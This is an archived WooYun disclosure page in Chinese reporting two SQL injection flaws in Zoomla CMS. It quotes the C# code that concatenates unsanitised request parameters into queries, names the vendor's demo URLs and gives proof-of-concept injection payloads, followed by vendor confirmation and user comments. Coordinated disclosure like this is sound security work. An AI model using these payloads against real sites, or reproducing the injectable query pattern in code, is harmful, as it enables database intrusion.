当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060025

漏洞标题:逐浪CMS多处sql注入漏洞

相关厂商:逐浪CMS

漏洞作者: what_news

提交时间:2014-05-09 11:24

修复时间:2014-08-07 11:26

公开时间:2014-08-07 11:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-09: 厂商已经确认,细节仅向厂商公开
2014-05-12: 细节向第三方安全合作伙伴开放
2014-07-03: 细节向核心白帽子及相关领域专家公开
2014-07-13: 细节向普通白帽子公开
2014-07-23: 细节向实习白帽子公开
2014-08-07: 细节向公众公开

简要描述:

逐浪最新版 是2014年4月发布的

详细说明:

地址

http://demo.zoomla.cn/Guest/ask/List.aspx


源码如下

protected void Page_Load(object sender, EventArgs e)
{
string str = "";
if (!base.IsPostBack)
{
DataTable table;
if (this.b_User.CheckLogin())
{
this.user.Text = this.b_User.GetLogin().UserName;
string userName = this.b_User.GetLogin().UserName;
str = " And UserName<>'" + userName + "'";
}
if (!string.IsNullOrEmpty(base.Request["strWhere"]))
{
table = this.b_Ask.Sel("Qcontent LIKE '%" + base.Request["strWhere"] + "%'" + str + " And Status=1", " AddTime desc"); //参数没处理
}
else if (string.IsNullOrEmpty(base.Request["strWhere"]) && !string.IsNullOrEmpty(base.Request["QueType"]))
{
table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc");//这里也没处理
}
else
{
table = this.b_Ask.Sel("Status=1 " + str, " AddTime desc");
}
string str3 = "";
string item = "";
IList<string> list = new List<string>();
Repeater repeater = new Repeater();
if (table != null)
{
foreach (DataRow row in table.Rows)
{
if (string.IsNullOrEmpty(str3))
{
item = row["Qcontent"].ToString();
list.Add(item);
}
}
}
repeater.DataSource = list;
repeater.DataBind();
if (table != null)
{
this.Bind(table);
}
if (table != null)
{
table.Dispose();
}
list.Clear();
}
}


第二处SQL注射:
之前2月份提交 WooYun: 逐浪cms通用型Sql注入漏洞 修复不完善依然存在注入

protected void Page_Load(object sender, EventArgs e)
{
if (!base.IsPostBack)
{
DataTable table;
string str = base.Request["ID"];
string strWhere = "";
if (this.b_User.CheckLogin())
{
string userName = this.b_User.GetLogin().UserName;
this.user.Text = userName;
strWhere = " UserName='" + userName + "'";
}
if (string.IsNullOrEmpty(base.Request["QueType"]) && string.IsNullOrEmpty(str))
{
table = this.b_Ask.Sel(strWhere, "");
}
else if (string.IsNullOrEmpty(base.Request["QueType"]) && !string.IsNullOrEmpty(str))
{
table = this.b_Ask.Sel(strWhere + " and ID=" + str, "");
}
else
{
table = this.b_Ask.Sel(" QueType like'%" + base.Request["QueType"].ToString() + "%'" + strWhere, ""); //存在注入
}
string str5 = "";
string item = "";
IList<string> list = new List<string>();
Repeater repeater = new Repeater();
if (table != null)
{
foreach (DataRow row in table.Rows)
{
if (string.IsNullOrEmpty(str5))
{
item = row["Qcontent"].ToString();
list.Add(item);
}
}
}
repeater.DataSource = list;
repeater.DataBind();
if (table != null)
{
this.Bind(table);
}
if (table != null)
{
table.Dispose();
}
list.Clear();
}
}


漏洞证明:

访问

http://demo.zoomla.cn/Guest/ask/List.aspx


post提交

strWhere=%' and (select @@version) >0 and '%'='


595.png


第二处SQL注射

http://demo.zoomla.cn/Guest/ask/MyAskList.aspx


提交

QueType=' and (select @@version)>0 and '%'='


596.png

修复方案:

再次修复

版权声明:转载请注明来源 what_news@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-05-09 17:19

厂商回复:

感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-09 11:40 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    回头想想来个合集试试。

  2. 2014-05-09 11:41 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    @wefgod 顶你

  3. 2014-05-09 12:23 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    如果有什么好的漏洞的话,发exp最好了!

  4. 2014-05-09 13:41 | 五色花 ( 路人 | Rank:0 漏洞数:1 | jvav)

    不错 支持高手下

  5. 2014-05-09 17:25 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    @疯狗 早知道不合并了 合并了也是6rank

  6. 2014-05-09 17:51 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    @疯狗 怎么只有rank 没wb ??

  7. 2014-05-09 17:56 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @what_news 延迟 稍等即可 (由于wb算法实在是忒复杂了)

  8. 2014-05-09 18:08 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    @逐浪CMS rank再给高点

  9. 2014-05-12 23:29 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @疯狗 尼玛,这种wb算法还复杂。lambda(level): "高"==level and 4 or "中"==level and 2 or "低"==level and 1

  10. 2014-05-30 00:03 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 由于wb算法实在是忒复杂了,是不是也类似挖矿?